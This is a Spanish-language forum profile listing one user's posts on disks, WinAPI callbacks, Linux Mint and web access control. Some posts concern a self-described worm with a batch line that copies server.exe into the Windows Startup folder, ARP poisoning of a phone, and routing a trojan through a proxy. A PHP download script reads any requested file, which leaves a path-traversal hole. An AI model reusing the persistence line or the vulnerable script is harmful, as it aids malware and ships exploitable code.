elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Temas
Páginas: [1]
1  Sistemas Operativos / Windows / Problema discos duros, colision de firmas en: 9 Septiembre 2012, 16:50 pm
Buenas!
El caso es que tengo un portatil con un hdd samsung de 500gb con 4 particiones

tambien tengo un hdd externo usb de samsung de 500gb pero con una particion fat32.

Lo que pasa es que a veces se genera una colision de firmas entre los dos discos duros que acaba resultando en que la tabla de particiones del primer disco se clone al segundo, y por ello pierdo los datos.

No se como puedo hacer para solucionar esto, como dato el hdd externo esta preparado para ser booteable, es donde tengo las distros live de linux.

Un saludo y gracias!

2  Seguridad Informática / WarZone / Prueba misc_memoria y posible error para encontrar la solucion en: 8 Septiembre 2012, 13:27 pm
Hola!
Acabo de pasar la prueba de misc_memoria, pero la pagina que creo que hay que usar para solucionarlo no funciona correctamente.
Si selecionas la fecha que te indica no te aparece la fecha correcta, y por lo tanto la noticia no es la primera...
Para que aparezca de primera hay que selecionar la anterior, creo que es en octubre.

(no pongo la pagina para no dar pistas pero si sus iniciales) T.I.A.

salu2!
3  Programación / Programación C/C++ / Funciones callback? en: 20 Agosto 2012, 13:17 pm
Hola!
Estoy adentrandome poco a poco en la winAPI, y quiero utilizar una funcion para listar las ventanas abiertas.

La funcion es esta:
Código:
BOOL WINAPI EnumWindows(
  _In_  WNDENUMPROC lpEnumFunc,
  _In_  LPARAM lParam
);
http://msdn.microsoft.com/en-us/library/windows/desktop/ms633497%28v=vs.85%29.aspx

El tema que no se que es una funcion callback, ni como se usa.
Tampoco he encontrado informacion suficiente para utilizarla yo mismo.

Lo que necesito es comparar el nombre de todas las ventanas con un texto, si existe que devuelva TRUE, y si no FALSE; aunque con que consiga usar la funcion ya me arreglo.

Salu2 y gracias!
4  Comunicaciones / Redes / Problema cain, arp poison en: 30 Julio 2012, 21:18 pm
Hola!
Aqui aprendiendo sobre vulnerabilidades en redes :)

EL tema es que estoy intentando hacer un envenenamiento arp a un telefono conectado al wifi de mi lan, pero al activarlo me lo deja sin internet...  :huh: :huh:

¿Que falla?
he cambiado la clave del registro de reenvio ip

salu2 y gracias!
5  Programación / Desarrollo Web / Proteger acceso a carpeta sin no estamos logeados[RESUELTO!] en: 27 Febrero 2012, 22:38 pm
Hola!
tengo un server web en el que hay que logearse para acceder al explorador de archivos.
El problema es que si tienes el link completo puedes descargarte el archivo sin estar logeado

Quiero utilizar algo como (no es por hacer spam) al intentar acceder a este archivo:
http://www.scenebeta.com/system/files/private/DeluxePacmanv196WinENG.rar

si estas logeado se descarga
si no te envia a una pagina de login

he intentado trastear con el .htaccess pero no se como leer si está la persona logeada(utilizo php session)

gracias!

EDIT:
He encontrado como conseguir proteger el acceso a archivos si no tienen privilegios:
El sistema consta de 3 archivos:

.htaccess
Código:
Options +FollowSymlinks
RewriteEngine on
RewriteRule ^archivos/(.*)$ /docs/descargar.php?file=archivos/$1 [R,L]

descargar.php
Código:
<?php
// Creado por Maflw en 2011
// Publicado en http://maflw.webuda.com por
  // forza la descarga del archivo
        //MODIFICADO POR ROILIVETHELIFE
if(isset($_GET['file']) && $_GET['file']!="" && $_GET['file']!="descargar.php"){
$file = $_GET['file'];
$path = str_replace(" ", "-", $_GET['file']);
$filename = basename($path);
if (file_exists($file)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.$filename);
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    ob_clean();
    flush();
    readfile($file);
    exit;
}
}
?>

y el otro archivo es el ENCODE explorer http://encode-explorer.siineiolekala.net/

Teneis que modificar el descargar.php para que descarge el archivo unicamente si está logeado(eso depende del sistema que use cada uno)
El encode explorer lo tengo modificado con el mismo sistema para no poder ver el listado de archivos si el user no está logeado.

En los archivos ejemplo la web esta distribuida asi:
Citar
Localhost/docs->archivos del encode explorer, el descargar.php y el htaccess
Localhost/docs/archivos-> donde están los archivos


EL unico fallo son las tildes, que no encontre la forma de que funcionase bien, hay que modificar el htaccess para resolverlo, y debeis arreglar el descargar.php para que no usen cosas como ../../
Salu2!


6  Programación / Scripting / Pequeña duda en batch [solucionado!!!!] :D en: 2 Noviembre 2011, 20:43 pm
Hola!
Estoy programando un worm, pero me falla una parte vital, que es la de autoarranque con windows.
Tengo este codigo pero me da "error de sintaxis"
Código:
@echo off
REM esta carpeta vale si es windows xp solo
copy /Y server.exe %homedrive%\Documents and Settings\%username%\Menú inicio\Programas\Inicio
(Hay un archivo llamado server.exe donde se ejecuta el bat y la carpeta a donde quiero copiar existe)

y otra preguntita si no es mucho pedir:
como hacer desde batch, saber si un sistema es windows xp o vista/7

gracias!
7  Sistemas Operativos / GNU/Linux / Opinion y Errores de linux para un novato en esto... en: 4 Octubre 2011, 22:56 pm
¡Hola!
Recien llegado a mi pc de sobremesa acaba de llegar Linux Mint 11 "katya", que para los que no conocen esta distro esta basada en ubuntu.
He encontrado algun problema, algunos solventados y otros no:

-Configurar el SO a español 100%:[error solucionado]
Esto es algo que me ha costado un poquito, el so por defecto viene en ingles, y me ha costado instalar los paquetes de idioma español y eliminar los de ingles.

-Configurar la tilde[error NO solcionado]
Es algo que todavia no he encontrado solucion, he probado todos los modos de teclado y no me funciona la tilde. En otro pc o en modo live en un portatil me funcionaba.

-Tener que marcar siempre cualquier ejecutable bajado de internet o de donde sea para ejecutarlo[opinion]
Pues eso, que me parece un rollazo tene que marcar cada archivo que quiero ejecutar, como tal.

-Cambiar propiedades de sistema archivos NTFS [duda No solucionada]
Esto me deriva de lo anterior: al tener que marcar los archivos como ejecutables para abrirlos, en una unidad ntfs no puedo emular los programas instalados con wine porque da error.
Este es uno de los motivos de que tenga el XP "por si acaso" y para jugar al COD


Excepto esto Mint me parece un gran sistema operativo, moderno, muy versatil y muy facil de manejar para un novato en linux (de momento eh!, xD) como yo.

Si sabeis como solucionar algun problema de los de antes agradeceria vuestra respuesta, y para los que no, siento haberos dado el toston!

Gracias!
8  Seguridad Informática / Hacking / [SOLUCIONADO] Saltearse un proxy en: 28 Septiembre 2011, 21:14 pm
EDIT:Configurandolo con un proxy anonimo me funciona, a veces falla pero suele ir bien.
Gracias a todos los que ayudaron



!Hola!
Soy nuevo en este foro :) y no sé si este tema va aquí Pero creo que sí)

El caso es que quiero controlar un ordenador remotamente, el pc remoto no conecta a mi pc porque su proxy le bloquea la conexion.(Desde el pc remoto solo se puede creo usar los puertos 80 y el de https).

He estado buscando en sangoogle y tengo alguna idea de como hacerlo, pero no se si es lo correcto. ahí van:
-he leido algo de encapsulacion ssl pero no hé encontrado nada de ese tema.
-También algo de usar socksCap para que el troyano se conecte a mi a través de otro proxy(no se si funcionaría)
-En este ultimo caso podría configurar mi pc como proxy para que la conexion fuera veloz y sin retardos.

¿Saben si algo de esto me funcionaría?
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines